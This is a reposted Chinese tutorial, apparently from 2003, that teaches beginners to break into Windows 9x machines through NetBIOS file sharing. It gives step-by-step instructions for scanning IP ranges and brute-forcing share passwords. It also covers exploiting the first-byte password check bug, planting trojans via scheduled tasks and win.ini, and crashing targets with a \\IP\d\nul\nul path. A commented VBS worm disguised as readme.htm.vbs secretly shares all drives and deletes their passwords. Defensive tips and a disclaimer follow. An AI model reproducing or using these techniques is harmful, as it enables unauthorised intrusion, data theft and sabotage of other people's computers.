神马文学网电脑知识
来源:百度文库 编辑:神马文学网 时间:2024/10/01 09:00:32
共享入侵的五个步骤【转贴】
网络上的攻击方法层出不穷,但对于那些想当黑客的初学者而言,利用Net BIOS入侵是首选的入侵方式。可以说网上有关Net BIOS的文章多如牛毛,可是针对初学者的实用性强的文章却不太多,比如大多数此类文章对网络设置都没好好讲过,使许多初学者至今都没成功入侵过。
一、入侵前的准备
一台用Modem上网的个人电脑(保证自己有充分的支配权),*作系统最好是Windows 98,再加一个可以显示IP的QQ,还要有一个搜索网络共享机器的好软件。在这里推荐大家使用国产黑客软件网络刺客II,该软件功能强大,拥有网络嗅探器(Sniffer)、因特网共享资源扫描(Share Scan)、在线弱口令检测(Password Check)和网络工具 (Network Tools等4大功能模块,是搜寻共享机器的好帮手。
二、共享入侵的流程
1.检查自己的网络设置是否符合入侵要求
有相当多的初学者不能成功入侵共享机器就是因为没有正确设置网络环境,因为Windows 98默认安装时并没有安装“文件与共享服务”,所以不能进行共享访问。请先检查爱机有没有“网络邻居”,如果没有,就依次进入“控制面板”→“网络”,选中“Microsoft 网络用户”为主网络登录方式,然后点击“文件及打印共享”,选中“允许其它用户访问我的文件”,最后按“确定”后,按提示放人Windows 98安装光盘进行补装。重启后你会发现你的桌面上多了个“网络邻居”。接下来我们再依次点击“我的电脑”→“拨号网络”的“服务器类型”标签, 选中“登录网络”这一项并选上“NetBEUI”协议(因为“登录网络”很影响拨号速度,大部分人都早把它取消了,这也是最易被忽略的共享设置)。经过这样的设置,我们就可以远程访问共享计算机了。
注:设置共享不需要网卡
2.搜索Internet上的共享机器
我们首先要确定我们的目标。打开先前已下载好的带IP补丁的QQ,在你的QQ好友里随便选一个,和他聊上几句,会显示出他的IP地址,假设这个IP地址为203.172.11.67。
然后运行“网络刺客”,选择“主机资源”→“搜索共享资源”,在弹出的“搜索因特网共享资源”对话框,填入起始地址和结束地址,比如,起始地址填入203.172.11.0,结束地址填入203.172.11.225,点击“开始搜索”。如果你的机子性能不大好,就先喝上一杯可乐,几分钟后,回来看看,在“网络刺客II”左下角的主机资源框中将会出现一批主机。
3.入侵方式种种
入侵方法有好几种,这里我推荐两种最简单的入侵方式:
(1)是直接在“开始”→“运行”里输入\\IP(这个IP就是肉鸡的IP,注意“\\”不能少!)并回车,然后再过几十秒左右就会出现那台主机所有的共享目录,这时你就可以进行访问了,如果你能顺利访问C盘,就再试试能不能在里面创建一个文件,如果可以的话,恭喜你,这是一台完全共享C盘的主机,对于这样的主机。我们可以用木马来完全获得它的控制权,非常的简单。
(2)利用“网络刺客II”进入共享主机,任选一台机子,比如203.172.11.67,选中后单击右键,在弹出的菜单中选定“映射成网络硬盘”。如果网络刺客右下角的信息提示框告诉你映射失败,你还可以在右键菜单中使用“刷新共享资源”再试。 如果显示类似“203. 172.11.67发现共享资源”这样的信息,则再点击工具栏上的“映射指定网络硬盘”,用你机器上的多余盘符来映射共享的文件夹。在“路径”中输入“\X203.172.11.67\MY DOCUMENTS”,如果没出现错误提示框,那就是成功了!马上打开你的“资源管理器”,是不是多了一个网络盘?快看看,天啊,可以一览无余!
如果此文件夹被设为只读,那就只能偷看一番了,如果是完全共享,那你就可以为所欲为了!下载、上传、移动、删除、改名……不过一般情况下是需访问密码的,这也好办,网络刺客II专门准备了“猜解大师”来应付这种情况! 点击菜单条上的“猜解机”→“共享资源猜解机”,出现“猜解大师”对话框。在“目标地址”栏中输入加密文件夹,如“\\203.172.11. 67\OFFICE”,网络协议选“SMB(共享资源)”; 接着配置字典文件,单击 “字典设置”,出现“字典设置”对话框,配置完毕后回到“猜解大师”,单击“开始猜解”。如果对方的共享资源密码不太复杂的话,一般几分钟就搞定了。
“猜解大师”目前支持SMB、POP3、FTP 3种协议,并且全面支持Socks4和Socks5代理协议。再有“猜解大师”和John一样(John?没听过?哈哈,告诉你吧,这个软件是由著名的黑客组UCF出的,它是密码破解的开山鼻祖,支持 UNIX,DoS,Windows,速度超快,它所提出的对称密码破解法使DES算法不可解的神话彻底破灭),有保存进度功能,也就是说,如果今天你很忙,完全可以将进度保存起来,明天接着来,爽吧?网络刺客Ⅱ自带了两个字典:Chinese.dic和Domain.dic。其中Chinese.dic是中文姓名字典, Domain.dic是密码字典。由于这两个字典都很小,因此,多数情况下需要导入自己制作的字典才能破解出密码。个人认为用“万能钥匙”这个字典制作软件比较好,可以制作出电话号码、出生日期、姓名字母、英文数字等字典,如果你有兴趣,可以到http://lboy.topcoot.net/去下载它,那里是它的大本营。由于是全中文界面,使用很简单,这里就不介绍了。
在进行共享资源猜解过程中,有时会碰到这种情况:显示找到了密码,但在密码处却没有显示。这种情况有两种可能:一种是共享资源的密码本来就为空,另一种可能是你已经用正确的密码连到该共享资源上,这时再连接到该共享资源已经不需要密码了,所以网络刺客II提示成功,但密码为空。如果你想做实验,则可以使用“共享资源”菜单下的“删除网络硬盘”,将共享资源先断开,再使用“共享资源猜解机”来猜解密码。
在这里再教你一招:不使用“猜解大师”进入有密码校验的共享目录。我们可以利用Windows 9X/Me的共享目录密码校验的BUG来进入共享主机。实际上这是一个很老的漏洞了,Windows 9X/Me在验证共享密码时只检验第一字节,你可以通过输入不同的符号或字母来验证。如果你是Windows 98系统,拷贝一个经过改动的驱动文件vredir.vxd到C:\WWindows\system目录下覆盖源文件,重启机器:然后你进入有密码的共享目录,出来提示输入密码窗口时,不用敲密码,只要按住回车键不放,直到进入此目录。
注意: 出来密码不对提示时,你只要按住回车键不放,就选择了确定。一般密码都是在字符 OX20到OX80之间(1 6进制),因此最多试96次就可以了。不过这种方法对Windows NT机器不起作用。
以上两种破解共享密码的方式,本人极力推荐后者,理论上它可以在几分钟内破解开任何难度的密码。但是暴力破解不是—点也没用,在万不得已的时候,还是要用暴力破解的方式碰碰运气。至于为什么仍然要用到远程暴力破解,你再看看下一节就明白了。
4.共享计算机的利用
我们先讲完全共享C盘的情况,这种情况是最理想的,因为我们可以利用植入木马的方式来获得共享电脑的完全控制权。但问题在于怎么远程运行木马。我们分两种情况:
(1)对方电脑开启了计划任务程序。我们先在自己的电脑上配置好木马,推荐使用那些不知名的小木马,文件越小越好,然后在自己的计划任务中添加这个运行木马的任务(不要让自己运行),再到自己电脑的C:\Windows\Tasks,把那两个计划任务的文件拷到远程计算机的相应目录,再用ping IP time命令获知对方电脑的时间,最后根据这个时间重设远程计算机的计划任务程序,使木马的计划任务过几分钟就运行(可别忘了拷给远程计算机一个木马)。
(2)拷给远程计算机一个木马。在C:\Windows\win.ini中配置,在[Windows]段中的“load=”后写上你放置的木马的路径。这样,只要对方重启过计算机后,我们就可以进行控制了。如果对方不重新启动电脑该怎么办?我们可以使用共享炸法。共享炸法利用的是Windows 9X的设备名称解析漏洞。
Windows 9X的/CON/CON设备名称解析漏洞允许用户远程攻击,导致对方Windows 98系统崩溃。当Windows遇到包含设备名的非法路径时,Windows会解析这些路径,此时内核的溢出会导致整个系统出错。
我们知道CON是DOS下的特殊设备名,不允许用做文件名,为什么用CON/CON会引起死机呢?我们把系统转到DOS下进行试验,打人如下命令:copy aa.txt con,系统会显示aa.txt文件的内容,而如果换成:copy aa.txt>con,系统会提示文件不能拷贝到文件自身。而把CON换成 LPT或PRN,则输出aa.txt的内容到打印机。由此可见,CON在这里代表了文件的本身,用 CON/CON这个命令意味着不断调用这个文件自身,使系统资源迅速耗尽而死机,这比起用一些开窗口的命令让系统资源耗尽速度更快、更有效。因为开一个窗口需要一定的时间,来得及按下 Ctrl+Alt+Del键来关闭IE,而用上面的这个命令只是调用文件自身,速度实在太快,连按键的机会都没有。如果在资源管理器中选择的是“按 Web查看”,那么连预览时都会死机。
具体做法:只要对方存在共享,不管该共享资源有没有设置密码,都可以用这个办法使系统死机,迫使对方重新启动电脑。比如机器203.172.11.67上有一个名称为d的共享,则在“开始”菜单中“运行”中输入下面的命令可以使目标 Windows 9X系统崩溃:
\\203.172.11.67\d\nul\nul
如果对方有经验的话,以上方法是很容易被发现的,这里有个更好的方法介绍给大家——可以将对方所有的逻辑盘都共享,包括光盘。
5.共享对方计算机所有逻辑盘
(1)原理
我们知道,把一个目录设置为共享的时候,如果在共享名后面加上$符号,那么这个目录将变成一个隐含的共享目录,即对方的机器上看不见这个共享目录。但是如果对方知道共享目录名,仍然是可以访问的,只要在这个目录后面加上“$”符号就可以了。
虽然对方看不见这个共享目录,但是自己是可以看见的。不过,虽然我们已经加上“$”符号,但是我们仍然可以发现这个共享目录的图标下面已经加上了一个小手,表示这个目录已经被设置为共享。这样使用者就会知道机器被人改动过了。我们可以利用共享蠕虫之类的软件使对方不知道其硬盘被共享了。共享蠕虫的高明之处就在于:不光对方看不见这个共享目录,自己也是看不见这个共享目录的,这样就可以做到神不知鬼不觉了。当你把这个程序发给对方,对方执行完以后,他的机器就会全部被共享,而他自己却不知道!
要做到对方看不见很容易,只要在共享目录名后面加上$符就可以了;而共享蠕虫之类的程序是怎么做到连自己也看不出来的呢?其实道理说出来也是很简单的,秘密就在注册表中。
现在,请你运行Regedit命令,打开注册表,找到下面的子键:HKEY_LOCAL MACHINE\Software\Microsoft\Windows\Current Version\Network\LanMan,该键有共享驱动器或文件的控制信息。假设我们共享了一个share文件夹,则在屏幕的右边,你可以看见下面的内容:
◆Flags:共享标志
◆Parmlenc:经过加密后的完全共享密码
◆Parm2enc:经过加密后的只读共享密码
◆Path:共享的实际目录
◆Remark:用户共享说明
◆Type:类型属性
这些信息可以手动改变,以控制共享的各种级别状态。
共享有如下几种类型:
◆只读共享,无密码,flags=Oxl91(Ox表示 16进制数):
◆只读共享,需要密码,flags:Oxl01;
◆完全共享,无密码,flags=Oxl02:
◆完全共享,需密码,flags=Oxl02:
◆根据密码(只读密码或完全访问密码)访问共享,需密码,nags:Oxl03。
用户访问共享资源时,根据不同的情况拥有不同的访问权限。在使用资源时,密码不区分大小写,且最长不超过8位。在设置共享名时如果多加一个字符“$”,则只有知道此共享名的人具有对此目录的访问权限。以上5种共享,在设置之后,目录图标会发生变化,变成一只托手的图标。
由以上分析可知,共享分类完全是由Flags标志决定的,它的键值决定了共享目录的类型,当 flags=Ox302时,重新启动系统,目录共享标志消失,表面上看没有共享,实际上该目录正处于完全共享状态。网上流行的共享蠕虫,就是利用了此特性。如果把“Flags”=dword:00000302改成“Flags”=dword:00000402就可以看到硬盘被共享了,明白了吗?秘密就在这里!
Parmlenc、Parm2enc属性项是加密的密码, 系统在加密时采用了8位密码,分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算,要想求出密码,再进行一次异或运算,然后查ASCII表可得出目录密码(由此,大家不难看出,共享密码是非常脆弱的,只要有人有机会接触你的电脑,你的共享密码就不保了)。
(2)利用VBS编制共享蠕虫
知道原理以后,用VBS就可以编制一个简单的共享蠕虫,下面是主要的代码,我加了注释:
On error resume next//假如出现错误,跳到下一行执行 Set wscr=CreateObject("wscript.shell") //建立wscript调用模式wscr.regwrite"HKEY_ LOCAL_MACHINE\System\CurrentControlSet\ Control\ComputerName\ComputerName
\ComputerName","Share" //将计算机名修改为"Share" "HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Services\VxD\VNETSUP
\ComputerName","Share" //将计算机名修改为"Share"
for i=l to 5//循环5次
if i=1 then //第一次循环
DriveName="A"//驱动器名为"A"
else if i=2 then//第二次循环
DriveName="C"//驱动器名为"C"
else if i=3 then//第三次循环
DriveName="D"//驱动器名为"D"
else if i=4 then//第四次循环
DriVeName="E"//驱动器名为"E"
else if i=5 then//第五次循环
DriveName="F"//驱动器名为"F"
end if
end if
end if
end if
end if
wscr.regwrite"HKEY_LOCAL_MACHINE\ Software\Microson\Windows\CurrentVersion\ Network\lanMan\"&DriveName&"\Flags",302, "REG_DWORD"//共享名为&DriveName&’
wscr.regDelete "HKEY_LOCAL\MACHINE\ Software\Microson\Windows\CurrentVersion\ Network
\LanMan\"&DriveName&"\Parmlenc" //删除驱动器完全访问密码
wscr.regDdete"HKEY_LOCAL\MACHINE\ Software\Microsoft\Windows\CurrentVersion\Network
\LanMan\"&DriveName&"\Parm2enc" //删除驱动器只读密码
wscr.regwrite"HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\ Network
\LanMan\" &DriveName &"\Path", DriveName&":\" //设置访问路径
wscr.regwrite"HKEY_LOCAL_MACHINE\ Software\Microson\Windows\CurrentVersion\ Network
\LanMan\"&DriveName&"\Remark", "Share"//设置驱动器共享注释
wscr.regwrite"HKEY_LOCAL\MACHINE\ Software\Microson\Windows\CurrentVersion\ Network
\LanMan\"&DriveName &"\Type",0, "REG_DWORD"//设置驱动器类型next
将其存为VBS为后缀名的文件,如:readme. htm.vbs(WindOWS支持双后缀名),自己运行一下试试。重启你的计算机后,你会发现你的软盘A、硬盘(或光驱)C、D、E已全部共享!现在,如果你连入网络,别人就可以用网络工具查找计算机名为“Share”的计算机,进入你的计算机,你的资源便可以让别人任意使用了,而你却毫不知情!更有意思的是,你在网络属性中看不到自己的硬盘被共享了!因为我们把“P1ags”的键值改成“302”后就可以秘密共享!即便你曾设置了共享访问密码也不行,因为用这种方法,就删除了你设置的访问密码。
你可能觉得奇怪:既然对方和自己都看不见这个共享目录,那到底怎么使用呢?其实方法也很简单的,因为在“网上邻居”里是看不见的,所以我们需要到DOS方式下去使用。命令如下:
语法:net use<映射的盘符>\对方的IPC$
例如:net use x:\192.168.0.2D$
执行完这个命令以后,就将对方(192,168.0.2)的D盘映射成自己的X盘了。你就可以像使用C盘和D盘那样使用X盘了,当你切换到X盘后,对 X盘所进行的*作,实际上就是对方的D盘进行*作。
(3)该共享蠕虫的原理
有些朋友为了方便,会在Windows的“网络属性”叫“配置”当中的“文件及打印共享”项中,把“允许其他用户访问我的文件”和“允许其他计算机使用我的打印机”前面打上“√”,然后在硬盘“共享”里面的“根据密码访问” 设置一个只读或完全访问的密码,以为这样就可以万无一失了。其实,有心人只要写一个类似刚才你看到的VBS小程序,使你在不知晓的情况下运行,这样就可以使你的Windows系统不受密码的保护,完全暴露在网络上。如此一来,别人就可以在你的计算机里随意阅读、增删文件,为所欲为了……
解决办法:把HKEY_LOCAL_MACHINE\ Software\Microsoft\Windows\CurrentVersion\ Network\LanMan下面的“&DriveName&”删掉。狠一点的,也可以把Windows\system\下面的VServer.vxd(Microsoft网络上的文件与打印机共享虚拟设备驱动程序)删掉,再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的VServer键值删掉,就可永绝这类共享蠕虫的后路。
6.共享入侵的防范措施
最简单的方法就是取消所有共享,但如果你非要共享的话(尽量设为只读共享),那就要加上一个足够复杂的共享密码(混合的8位以上的密码),然后再下载一个共享目录的密码效验Bug补丁。虽然入侵者仍然可以试图通过暴力破解来解密,但是在实际中,只要你的密码够复杂,对手很难有机会,这还得归功于共享访问的蜗牛速度。
当然,如非必要,去掉NetBIOS的捆绑也是必须的。在安装TCP/IP协议时,NetBIOS被毫无必要地一起装上了(对于我们这些一般用户而言),或者说NetBIOS被捆绑在TCP/IP上了。我们要做的就是将NetBIOS从TCP/IP上解下来!
(1)对于最早的Windows 95用户
如果你使用的是最早版本的Windows 95,那关闭NetBlOS就是一件非常容易的事:找到系统里名为Vnbt.386的文件,随便将它改个名,如改为Vnbt.out,这就算大功告成了。
(2)Windows 95改进版、Windows 9x或是Windows Me用户
Windows 95改进版、Windows 9X或是Windows Me用户可采用下面的方法:
方法一:
(1)检查NetBEUI是否出现在配置栏中。打开“控制面板”,双击“网络”选项,打开“网络”对话框。在“配置”标签页中检查己安装的网络组件中是否有NetBEUI。如果没有,点击列表下边的“添加”按钮,选中“网络协议”对话框,在“制造商”列表中选择“微软”,在“网络协议”列表中选择“NetBEUI”。点击“确定”,根据提示插入安装盘,安装 NetBEUI。
(2)回到“网络”对话框,选中“拨号网络适配器”,点击列表右下方“属性”按钮。在打开的“属性”对话框中选择“绑定”标签页,将除“TCP/IP→网络适配器”之外的其他项目前复选框中的√都取消!
(3)回到“网络”对话框,选中“TCP/ IP→拨号网络适配器”,点击列表右下方“属性”按钮,不要怕弹出的警告对话框,点击“确定”。在“TCP/IP属性”对话框中选择“绑定”标签页,将列表中所有项目前复选框中的√都取消!点击“确定”,这时Windows会警告你:“尚未选择绑定的驱动器。现在是否选择驱动器?”点击“否”。之后,系统会提示重新启动计算机,按“确认”。
(4)证实已取消绑定。重新进入“TCP/IP→拨号网络适配器”的“TCP/IP属性”对话框,选定“NetBIOS”标签页,看到“通过TCP/IP启用NetBIOS”项被清除了吧。
方法二:运行RegE dit,exe查找串“vnetbios”,找到后再选择“查找下一个”,将找到像“blahblah\VxD\VNETBIOS\”的串,删除“VNETBIOS”项即可。*作一定要谨慎,误*作可能导致系统崩溃:另外,关掉139端口后,将无法共享文件和打印功能。
(3)对于WinNT用户
在WindowsNT下,你可以取消NetBIOS与 TCP/IP协议的绑定。可以按如下步骤进行:点击“控制面板→网络→NetBIOS接口→Windows客户(TCP/IP)→禁用”,再点“确定”,然后重启。这样,NT的计算机名和工作组名也隐藏了,不过会造成基于NetBIOS的一些命令无法使用,如net命令等。
(4)对于Windows 2000用户
在Windows 2000下,不采用“文件和打印共享”即可,但这样也不能访问别人的NetBIOS了。有没有其他办法呢?
其实你可以这样做:在“路由和远程访问”管理工具中,将“IP路由选择”中“本地连接”属性中的“输入筛选”设置成139端口关闭就行了。
以上的方法都是给不需要连接入局域网的单机用户提供的,如果你是一台拨号上网的单机,那么完全可以禁止NetBIOS服务。但是如果你需要接人局域网的话,则不能关闭NetBlOS服务,否则LAN上的其他机器将无法访问你的资源了,关闭该服务后,你不能连接到LAN上的任何用户, LAN上也无法看到你的计算机。
如果你必须用共享而又对安全重视的话,建议不要使用“共享级的访问控制”,而用“用户级的访问控制”(在本机的“控制面板”→“网络”→“访问控制”下设置)。这样Windows 9x就会从网络上的主域控制器来读取用户访问列表。而在设置资源共享的时候,你可以具体到为每个用户设置相应的权限。当然,如果你想比较好地控制自己的共享资源的话,可以把Windows自带的“网络监视器”装上,这样对于到底是谁在使用你的共享资源就能心中有数,而且如果发现有未经你允许而使用你本机共享资源的情况,也可以马上把它断开,真正做到“实时监控”。
另外,对于安装了NT的用户来说,如果你用自己的“服务器管理器”看一看你现在本机的共享目录,会发现有一个名为“IP C$”备注为“Remote IPC”的共享,其实对于个人用户来说,这个共享并不是必需的,而且如果你上网的话,它还可能成为别人破解你用户名和口令的一个缺口,所以它也应该删除。
注:如果你的NT是主域控制器,或者提供域认证,那么就不要删除这个共享,否则别人就不能登录你的服务器了。但对于个人拨号上网用户来说,最好删除。
写在最后:请大家不要用本文提到的方法去做触犯国家法律的事情,切记:己所不欲,勿施于人!
[ Last edited by hai77528 on 2003-5-27 at 11:36 AM ]
